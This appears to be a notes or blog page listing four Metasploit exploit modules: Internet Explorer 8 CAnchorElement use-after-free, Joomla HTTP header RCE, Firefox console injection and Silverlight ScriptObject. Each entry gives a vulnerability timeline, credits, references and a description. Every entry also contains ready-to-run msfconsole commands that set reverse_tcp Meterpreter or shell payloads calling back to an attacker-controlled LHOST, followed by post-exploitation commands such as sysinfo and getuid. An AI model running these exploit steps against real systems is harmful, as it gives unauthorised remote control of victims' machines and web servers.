CVE-2013-3163 Microsoft Internet Explorer CAnchorElement UAF

Timeline :

Vulnerability discovered exploited in targeted attacks
Vulnerability reported to the vendor by Jose Antonio Vazquez Gonzalez via VeriSign iDefense Labs
Patched by the vendor the 2013-07-09
Metasploit PoC provided the 2013-09-09

PoC provided by :

Jose Antonio Vazquez Gonzalez
Orange Tsai
Peter Vreugdenhil
sinn3r

Reference(s) :

CVE-2013-3163
OSVDB-94981
MS13-055

Affected version(s) :

All versions of Internet Explorer 8 on Windows.

Tested on :

with Internet Explorer 8 on Windows 7 SP1

Description :

In IE8 standards mode, it’s possible to cause a use-after-free condition by first creating an illogical table tree, where a CPhraseElement comes after CTableRow, with the final node being a sub table element. When the CPhraseElement’s outer content is reset by using either outerText or outerHTML through an event handler, this triggers a free of its child element (in this case, a CAnchorElement, but some other objects apply too), but a reference is still kept in function SRunPointer::SpanQualifier. This function will then pass on the invalid reference to the next functions, eventually used in mshtml!CElement::Doc when it’s trying to make a call to the object’s SecurityContext virtual function at offset +0x70, which results a crash. An attacker can take advantage of this by first creating an CAnchorElement object, let it free, and then replace the freed memory with another fake object. Successfully doing so may allow arbitrary code execution under the context of the user. This bug is specific to Internet Explorer 8 only. It was originally discovered by Jose Antonio Vazquez Gonzalez and reported to iDefense, but was discovered again by Orange Tsai at Hitcon 2013.

Commands :

use exploit/windows/browser/ms13_055_canchor
set RHOST 192.168.6.143
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.6.138
exploit

sysinfo

CVE-2015-8562 Joomla HTTP Header Unauthenticated RCE

Timeline :

Vulnerability discovered exploited in the wild
Patched by the vendor the 2015-12-14
Metasploit PoC provided the 2015-12-16

PoC provided by :

Marc-Alexandre Montpas
Christian Mehlmauer

Reference(s) :

CVE-2015-8562
20151201

Affected version(s) :

All versions of Joomla versions between 1.5.0 to 3.4.5 included.
In order to exploit this vulnerability PHP must also be vulnerable to the deserialisation vulnerability.

Tested on :

Joomla 3.4.5 on Linux ubuntu-1210 with PHP 5.4.6-1ubuntu1

Description :

Joomla suffers from an unauthenticated remote code execution that affects all versions from 1.5.0 to 3.4.5. By storing user supplied headers in the databases session table it’s possible to truncate the input by sending an UTF-8 character. The custom created payload is then executed once the session is read from the databse. You also need to have a PHP version before 5.4.45 (including 5.3.x), 5.5.29 or 5.6.13. In later versions the deserialisation of invalid session data stops on the first error and the exploit will not work. The PHP Patch was included in Ubuntu versions 5.5.9+dfsg-1ubuntu4.13 and 5.3.10-1ubuntu3.20 and in Debian in version 5.4.45-0+deb7u1.

Commands :

use exploit/multi/http/joomla_http_header_rce
set RHOST 192.168.6.143
set PAYLOAD php/meterpreter/reverse_tcp 
set LHOST 192.168.6.138
exploit

sysinfo

CVE-2013-1710 Firefox toString console.time Privileged Javascript Injection

Timeline :

Vulnerability discovered by moz_bug_r_a4
Vulnerability reported to the vendor by moz_bug_r_a4 the 2013-05-12
Patched by the vendor the 2013-08-06
Metasploit PoC provided the 2014-08-15

PoC provided by :

moz_bug_r_a4
Cody Crews
joev

Reference(s) :

CVE-2013-1710
MFSA-2013-69

Affected version(s) :

All versions of Mozilla Firefox versions between 15 and 22 included.

Tested on :

Windows 7 SP1 with Mozilla Firefox 22.0

Description :

This exploit gains remote code execution on Firefox 15-22 by abusing two separate Javascript-related vulnerabilities to ultimately inject malicious Javascript code into a context running with chrome://privileges.

Commands :

use exploit/multi/browser/firefox_tostring_console_injection
set SRVHOST 192.168.6.138
set PAYLOAD firefox/shell_reverse_tcp 
set LHOST 192.168.6.138
exploit

SYSTEMINFO

MS13-022 Microsoft Silverlight ScriptObject Unsafe Memory Access

Timeline :

Vulnerability discovered by James Forshaw
Patched by the vendor the 2013-03-12
PoC provided by Vitaliy Toropov the 2013-10-23
Discovered exploited into Exploit Kits the 2013-11-13
Metasploit PoC provided the 2013-11-22

PoC provided by :

James Forshaw
Vitaliy Toropov
juan vazquez

Reference(s) :

CVE-2013-0074
CVE-2013-3896
OSVDB-91147
OSVDB-98223
BID-58327
BID-62793
MS13-022
MS13-087

Affected version(s) :

All versions of Microsoft Silverlight 5 bellow version 5.1.20125.0

Tested on :

Windows 7 SP1 with Microsoft Silverlight version 5.1.20125.0

Description :

This module exploits a vulnerability in Microsoft Silverlight. The vulnerability exists on the Initialize() method from System.Windows.Browser.ScriptObject, which access memory in an unsafe manner. Since it is accessible for untrusted code (user controlled) it’s possible to dereference arbitrary memory which easily leverages to arbitrary code execution. In order to bypass DEP/ASLR a second vulnerability is used, in the public WriteableBitmap class from System.Windows.dll. This module has been tested successfully on IE6 – IE10, Windows XP SP3 / Windows 7 SP1.

Commands :

use exploit/windows/browser/ms13_022_silverlight_script_object
set SRVHOST 192.168.6.138
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.6.138
exploit

sysinfo
getuid